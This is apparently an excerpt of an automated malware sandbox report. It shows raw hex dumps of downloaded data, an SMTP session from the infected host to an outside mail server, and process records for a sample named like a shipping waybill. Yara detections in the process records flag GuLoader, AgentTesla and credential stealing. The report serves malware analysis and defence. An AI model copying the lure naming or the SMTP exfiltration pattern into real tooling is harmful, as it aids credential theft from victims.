99 1a df bb 09 2c 94 13 88 aa b4 e1 09 d3 f1 3e 37 2b db e9 ce 16 d3 69 79 64 69 94 52 09 26 e7 5a 1d 88 95
                                                                              Data Ascii: (fzW6b8&5k5P?W<ogp!/`jp<^nf(+dNP1t,wqf'k@9Di|E\#vb:v(xYB+u:R1[x8mg`Z_h!U06dy~%j${,>7+iydiR&Z
                                                                              2022-07-21 13:29:06 UTC208INData Raw: 38 77 db cb 10 17 ae 0a 84 f9 0b 6d fd b3 ee 4f 0c c3 4a e2 d0 70 ca 19 50 cd 01 33 c5 73 56 5f fa 56 de 67 d6 bd 25 a8 36 a7 96 7e 5a 94 ee 9c ac 44 42 09 14 ed 4a 8d 2a d5 54 5f 76 04 a3 7d 32 96 33 95 3c 86 c4 1f a9 ad d1 09 11 8a b5 07 31 80 22 cb 0e a6 42 d7 ab ee 14 ed 65 f9 ad 6c fa b3 d5 c2 8b ec bd 37 0f 0c 2e b1 10 86 a6 2f 2f 9c e6 50 18 80 0d e0 0d fd 68 1b 74 d3 4c f4 4f 52 9b f5 d5 f1 36 9f 86 33 01 93 98 bf ab 0d b3 bd b4 fa 21 06 30 5b 7c 6e db 6e 0a 4b 27 3c 15 22 72 dc a2 04 5c 81 3b 2d b2 67 79 c6 9f 6a 0d 74 63 93 a1 28 e4 73 eb 68 20 e4 d0 c3 be 28 40 75 db ea 33 bb 12 56 84 77 6e 27 fd 98 29 7f a1 a7 f4 a0 c9 d2 03 c7 49 b0 97 81 34 0c 69 91 c4 db f7 89 04 1b 13 47 44 7e dc 47 c0 72 e0 f0 5f 14 b0 9b bc ae 11 02 77 9c e5 09 72 17 61
                                                                              Data Ascii: 8wmOJpP3sV_Vg%6~ZDBJ*T_v}23<1"Bel7.//PhtLOR63!0[|nnK'<"r\;-gyjtc(sh (@u3Vwn')I4iGD~Gr_wra
                                                                              2022-07-21 13:29:06 UTC209INData Raw: 65 33 ef 17 f3 bd 92 95 f1 c8 7d 73 0c 94 4c f3 92 30 2b 1c 97 25 e8 3a 68 29 16 08 bc 18 b9 9f 58 7e 66 02 20 2a f1 67 bd 33 c6 15 c7 18 21 3d 2b 85 a4 97 36 7a 7b 45 b7 51 f0 b9 e2 e5 4b 30 7e c9 84 8c 08 38 63 28 90 5a d9 51 51 a3 af 4f 32 d0 4a 52 ce fa 1e 5d 9e 76 35 b1 d8 f8 37 74 7e b1 a6 7b 33 ce 52 c4 e1 ea 61 2f b5 9c dd bf 13 99 f8 ba 7e 11 c2 ac d1 2b 96 bd cf 1a ca fd 51 cd 92 d6 ac 8b db 39 1f e7 84 ef 99 f3 18 05 fb f8 d1 c9 e9 a4 ad 68 89 d9 0a 27 6a 18 d3 2e f2 49 05 01 69 13 6f db
                                                                              Data Ascii: e3}sL0+%:h)X~f *g3!=+6z{EQK0~8c(ZQQO2JR]v57t~{3Ra/~+Q9h'j.Iio
                                                                              2022-07-21 13:29:06 UTC210INData Raw: 12 70 8b 58 9c 4f b6 a4 e0 e2 ba 1c 25 0f b9 c4 79 62 25 fd d5 0e 4d 83 24 82 0a 70 b8 02 8d f4 58 c2 59 0f 0a 26 e2 34 93 f6 44 83 19 b2 48 46 2a 03 e1 49 ff ac c0 a6 f5 1c 9e e7 4c e5 84 a7 99 77 2b 34 94 32 e1 2d dc c6 ba 2d 20 bc d6 bb 38 59 44 aa 6b ea e8 98 cb ec a1 b9 7e 27 5e 38 d7 e8 13 e2 d0 3e c9 28 9b 97 88 b0 26 c2 e5 c0 e6 56 3c 24 5e 40 d7 13 cf 69 74 7f e8 9f 41 1e 4e ea 5a 16 83 9b 83 ef 53 75 25 48 95 cb 7f eb aa fb d4 98 ec a1 3e 42 10 58 ea db 79 10 92 cb 4d 05 c4 2d e5 11 26 32 94 ed ac c7 14 16 d4 a4 8c fe 39 3d b2 a1 99 f1 7b ae 2f 1b c8 77 8a 77 a2 8a 79 a0 62 45 7f 52 44 30 4f 0d 5a c0 63 02 7a a9 e3 1a bb 63 af e6 35 2a 87 23 f9 c4 44 dc 3a ea cc 0a 5f 77 9f 2a 55 e5 66 e8 a7 6d d5 a5 0c de 98 9e d7 41 ad 8d da b4 57 c5 6b 9e 54
                                                                              Data Ascii: pXO%yb%M$pXY&4DHF*ILw+42-- 8YDk~'^8>(&V<$^@itANZSu%H>BXyM-&29={/wwybERD0OZczc5*#D:_w*UfmAWkT
                                                                              2022-07-21 13:29:06 UTC211INData Raw: 76 55 04 69 ce 43 f8 5d 55 09 ab e1 e6 2a 10 81 10 0f 88 87 34 87 1d 21 b1 a4 f5 28 1d 07 df 55 79 c7 e0 d0 4d 37 af 9d e9 6e a5 aa 83 8b 8e 3c be 38 90 fa a8 99 6a 0d 67 63 8f 2e 35 fb fe c0 1f 3c 9f d0 ca b7 25 52 62 55 39 3c bb e6 43 84 64 7c a4 21 97 35 f0 bb a8 dd b2 ca 47 cc 46 9a ac 8b 12 bd ef 6e f6 56 87 a7 9d a5 12 1c c3 af f7 b3 5d c3 75 87 78 8c 1b b0 94 33 a8 0b 9f 8d 9a da 7b 7f 07 7b e5 94 2a e3 70 83 9a 08 60 22 88 82 c0 eb 19 ee ef 02 f0 96 63 7e 71 fa e4 21 64 ce 33 af 57 93 8d 3a 02 b0 f0 ef f9 50 e6 d8 91 e4 44 25 11 cf b2 6b 95 55 6c 45 8b a3 dd de 4c 65 e7 66 29 d7 ce a2 ae c2 6d 25 c4 c6 bd 12 31 a6 eb 7f a1 9e d9 22 56 ee e8 dc a3 92 3d 85 5b 0e 29 b4 f3 13 3a 79 08 61 30 b3 e7 0e ab 90 fe e7 7c f6 0c bf 22 b6 fb 1c d8 88 09 e4 14
                                                                              Data Ascii: vUiC]U*4!(UyM7n<8jgc.5<%RbU9<Cd|!5GFnV]ux3{{*p`"c~q!d3W:PD%kUlELef)m%1"V=[):ya0|"
                                                                              2022-07-21 13:29:06 UTC212INData Raw: a3 4f 9c dc 9a c9 fe 4d c1 9f 5b 67 88 da f5 00 76 c0 e1 91 fa 02 61 6a bc 84 c1 e0 a4 b1 67 87 d5 0c 38 e1 d5 d3 2f 42 45 03 13 e2 d8 67 ca 91 02 9c db 5a 47 b8 ad e3 f7 39 d8 22 1a ac 45 14 75 21 e1 d7 01 50 9b 22 97 13 ff fb 0d 9a eb 56 48 8e 12 10 a0 ed 29 89 7e 91 86 16 22 c1 20 3c 9d 99 da 18 c5 d2 24 8a 05 1b cf 5f 92 87 ae 90 68 b7 79 99 10 e9 37 43 a3 a1 0e 29 b3 49 d7 2c 42 66 a3 7e 6e 98 9e ee e3 a6 a4 69 87 81 37 cd 67 11 f0 c4 a2 09 27 94 18 88 aa ae 6a ff cd e9 26 2f 33 cc 63 4b 1b d4 79 68 ed b4 96 5a 1d b8 2b 45 16 8e 9e 85 e8 64 60 ae 80 86 5e b3 69 71 78 d2 83 f6 2f c3 43 17 cb 62 1b 76 0b 9f 46 96 86 c2 31 9f 39 3a 3d 93 7e 7d 3e 12 0e d0 35 c5 21 36 21 17 ae 98 f6 e9 f3 f3 08 4c 71 8c 6b 30 a9 ca ba ea ec 79 41 44 2a c6 0d 5a c0 76 02
                                                                              Data Ascii: OM[gvajg8/BEgZG9"Eu!P"VH)~" <$_hy7C)I,Bf~ni7g'j&/3cKyhZ+Ed`^iqx/CbvF19:=~}>5!6!Lqk0yAD*Zv
                                                                              2022-07-21 13:29:06 UTC213INData Raw: b8 0a 65 0a 1f 15 b1 45 2a ce 2a a4 47 d9 a9 f4 47 e7 02 eb 4e 89 96 bd a8 cc e9 e2 c1 39 75 02 52 a0 fc bf ca 21 21 94 fb 5e 13 a0 bd f1 3b 7c 5d 19 66 d3 0c f5 3c 47 fb 76 89 f3 56 91 ea 13 47 86 e0 3c fe 0f c5 bd ee fb 48 13 47 d8 2a 6c d5 60 0d 4e 25 2e 94 e7 50 b0 88 03 66 8f 1e 3f 00 82 4f c8 f3 64 33 69 6d 9d 83 3d f7 f0 d3 6a 68 ea b1 de dc 21 22 70 91 e4 58 a9 14 4b e9 71 1c 24 95 96 57 71 c7 a0 98 b5 b4 52 b0 c6 47 ad 99 93 95 e1 7b e4 e6 5a ae 8f 25 1a 47 c6 d4 76 bf 40 a3 67 a4 70 e7 15 cc 86 c1 a0 70 1f 16 94 a6 0e 62 02 73 c9 a3 3b d8 62 33 47 27 72 93 80 a2 dd de 0c fc 6f a7 f1 af e2 77 63 32 84 52 61 a8 46 c2 59 ef 83 46 83 d9 e2 03 0d 10 f4 cc 8c 8c 4c 73 16 dd bc 32 87 be b1 32 99 6d d5 9b 5e ac 3a 2a 3b 1a c6 dd 2e 25 7f e7 6d 81 af d5
                                                                              Data Ascii: eE**GGN9uR!!^;|]f<GvVG<HG*l`N%.Pf?Od3im=jh!"pXKq$WqRG{Z%Gv@gppbs;b3G'rowc2RaFYFLs22m^:*;.%m
                                                                              2022-07-21 13:29:06 UTC215INData Raw: cb d1 b5 bf a7 52 3c cc 56 4e dc 7b 16 4f eb 7e 28 b2 c5 e4 2a 68 63 ad bb 79 34 ce 50 d6 60 1f 6f 21 9d 9b cc aa 01 19 25 bb 6c 90 ca b9 c3 ab 4b bc dd 9b c2 f5 4d c3 8e d8 a2 99 59 30 11 f5 05 e7 91 fb 0a 70 e9 79 80 c1 e1 af ad 6e 87 d7 04 29 62 10 c2 ac 87 41 05 02 61 1d 61 ca 90 05 8d 58 9f 41 b8 ac e8 e6 ba 1d 26 07 bd c4 78 6c 26 f5 d5 0a 4c 93 2a 8a 02 7e 9f 05 86 e1 4a 42 84 0e 18 a7 ea 21 81 76 99 82 0b 33 40 48 38 80 88 5b 7c c1 d2 25 84 0e 1f ef 5e 90 8c ba 97 65 aa 65 91 12 e1 3f 5f ab bc 0d 21 ae 55 ca 30 5f 64 ab 79 69 9d 96 e0 eb ae ac 6c a7 83 39 c5 69 1b f7 c2 be 14 29 89 16 80 a2 a6 63 f8 ce f4 23 32 36 de e1 ca 16 d2 6c 7a 6d 69 97 4f 0c 3b e2 47 18 80 91 82 ea 71 72 2e 5d 87 4b a2 ea b8 7a dc 8d fe 21 e3 43 02 d9 e2 c6 77 1e 8e c5 5f
                                                                              Data Ascii: R<VN{O~(*hcy4P`o!%lKMY0pyn)bAaaXA&xl&L*~JB!v3@H8[|%^ee?_!U0_dyil9i)c#26lzmiO;Gqr.]Kz!Cw_


                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Jul 21, 2022 15:29:19.021500111 CEST5874977537.59.226.102192.168.11.20220-com325.raiolanetworks.es - ESMTP
                                                                              220- Do not use of this server to send unsolicited
                                                                              220 and/or bulk e-mails. These actions will be persecuted.
                                                                              Jul 21, 2022 15:29:19.021850109 CEST49775587192.168.11.2037.59.226.102EHLO 287400
                                                                              Jul 21, 2022 15:29:19.041359901 CEST5874977537.59.226.102192.168.11.20250-com325.raiolanetworks.es Hello 287400 [84.17.52.5]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-DSN
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Jul 21, 2022 15:29:19.041775942 CEST49775587192.168.11.2037.59.226.102STARTTLS
                                                                              Jul 21, 2022 15:29:19.062925100 CEST5874977537.59.226.102192.168.11.20220 TLS go ahead

                                                                              Click to jump to process

                                                                              Target ID:1
                                                                              Start time:15:28:16
                                                                              Start date:21/07/2022
                                                                              Path:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\AWB# 6174229350.exe"
                                                                              Imagebase:0x400000
                                                                              File size:665944 bytes
                                                                              MD5 hash:41BD0682B694583A44500D4035904843
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.83744400441.0000000002AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:3
                                                                              Start time:15:28:33
                                                                              Start date:21/07/2022
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\AWB# 6174229350.exe"
                                                                              Imagebase:0xed0000
                                                                              File size:108664 bytes
                                                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.83392924603.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate

                                                                              Target ID:4
                                                                              Start time:15:28:33
                                                                              Start date:21/07/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff762210000
                                                                              File size:875008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              No disassembly